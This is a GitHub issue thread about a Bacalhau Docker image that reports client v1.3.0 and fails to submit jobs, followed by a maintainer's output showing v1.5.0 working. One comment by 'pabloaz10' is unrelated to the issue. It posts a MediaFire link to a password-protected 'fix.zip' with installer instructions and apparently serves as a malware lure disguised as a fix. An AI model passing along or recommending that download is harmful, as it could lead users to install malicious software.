### ISSUE TITLE
Either remove, or update, our container

### ISSUE THREAD

**Issue by aronchick** [bacalhau-project/bacalhau#4350]
From a user cc @wdbaruni @MichaelHoepler 

Maybe update our docs too?

---

I tried out the instructions in the docs, and ran into some snags. When I run it from the command line, I get the error message below under heading 1. I looked at the job list and there are some completed jobs in there. The last one listed is e-f9ed3558 which completed 2024-06-30 13:20:13. When I run it using Docker, I get the error message under heading 2. The version command does work, and it shows this:

$ docker run -it [ghcr.io/bacalhau-project/bacalhau:latest](http://ghcr.io/bacalhau-project/bacalhau:latest) version

00:31:45.003 | INF pkg/repo/fs.go:93 > Initializing repo at '/root/.bacalhau' for environment 'production'

 CLIENT  SERVER  UPDATE MESSAGE 

 v1.3.0  v1.4.0                 

I’m not sure why the client version is at 1.3.0, but that seems to be causing a problem. Deleting the image and trying to explicitly pull 1.4.0 instead of ‘latest’ also gives an error (Error response from daemon: No such image: [ghcr.io/bacalhau-project/bacalhau:v1.4.0](http://ghcr.io/bacalhau-project/bacalhau:v1.4.0)). I played around with it a bit, but couldn’t find a way forward. Apologies if I missed something obvious!

– Eric

CLI Error 
$ bacalhau docker run ubuntu echo Hello World 

Job successfully submitted. Job ID: j-2a150d38-8522-4846-8afa-54fff07ff2e9

Checking job status... (Enter Ctrl+C to exit at any time, your job will continue running):

Communicating with the network  ................  err  ❌  0.0s

Error: not enough nodes to run job. requested: 1, available: 3, suitable: 0.

       • Node QmbxGSsM: node busy with available capacity {CPU: 0.10000000000000009, Memory: 1.7 GB, Disk: 1.7 TB, GPU: 0} and queue

       capacity {CPU: 1, Memory: 2.0 GB, Disk: 2.8 kB, GPU: 0}

       • Node n-e002001e: node busy with available capacity {CPU: 0.3500000000000001, Memory: 1.7 GB, Disk: 1.7 TB, GPU: 0} and queue

       capacity {CPU: 1.5, Memory: 3.0 GB, Disk: 1.2 GB, GPU: 0}

       • Node QmPLPUUj: node busy with available capacity {CPU: 0.3500000000000001, Memory: 3.7 GB, Disk: 1.7 TB, GPU: 0} and queue

       capacity {CPU: 1.5, Memory: 5.0 GB, Disk: 16 GB, GPU: 0}

To get more details about the run, execute:

bacalhau job describe j-2a150d38-8522-4846-8afa-54fff07ff2e9

To get more details about the run executions, execute:

bacalhau job executions j-2a150d38-8522-4846-8afa-54fff07ff2e9

Docker Error
$ docker run -t [ghcr.io/bacalhau-project/bacalhau:latest](http://ghcr.io/bacalhau-project/bacalhau:latest) docker run --id-only --wait ubuntu:latest -- sh -c 'uname -a && echo "Hello from Docker Bacalhau!"'

00:42:27.459 | INF pkg/repo/fs.go:93 > Initializing repo at '/root/.bacalhau' for environment 'production'

publicapi: after posting request: "This endpoint is deprecated. See the migration guide at https://docs.bacalhau.org/references/cli-reference/command-migration for more information"

That URL doesn’t give any information about the command we’re using, which appears to be ‘docker run’ with a shell script passed in as an argument. I suspect the problem is that client version 1.3.0 is getting used for some reason.

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wdbaruni** [comment]
docker is working with v1.5.0

```
→ docker run -it ghcr.io/bacalhau-project/bacalhau:latest version
Initializing repo at /root/.bacalhau
 CLIENT  UPDATE MESSAGE
 v1.5.0
```

```
→ docker run -t ghcr.io/bacalhau-project/bacalhau:latest docker run --api-host bootstrap.demo.bacalhau.org ubuntu:latest -- sh -c 'uname -a && echo "Hello from Docker Bacalhau!"'


Initializing repo at /root/.bacalhau
Job successfully submitted. Job ID: j-8ad85f47-ce1d-4225-8ae9-4c800301d771
Checking job status... (Enter Ctrl+C to exit at any time, your job will continue running):

 TIME          EXEC. ID    TOPIC            EVENT
 08:20:18.524              Submission       Job submitted
 08:20:18.535  e-1f5465dd  Scheduling       Requested execution on QmPLPUUj
 08:20:18.680  e-1f5465dd  Execution        Running
 08:20:19.528  e-1f5465dd  Execution        Completed successfully

To get more details about the run, execute:
	bacalhau job describe j-8ad85f47-ce1d-4225-8ae9-4c800301d771

To get more details about the run executions, execute:
	bacalhau job executions j-8ad85f47-ce1d-4225-8ae9-4c800301d771
```
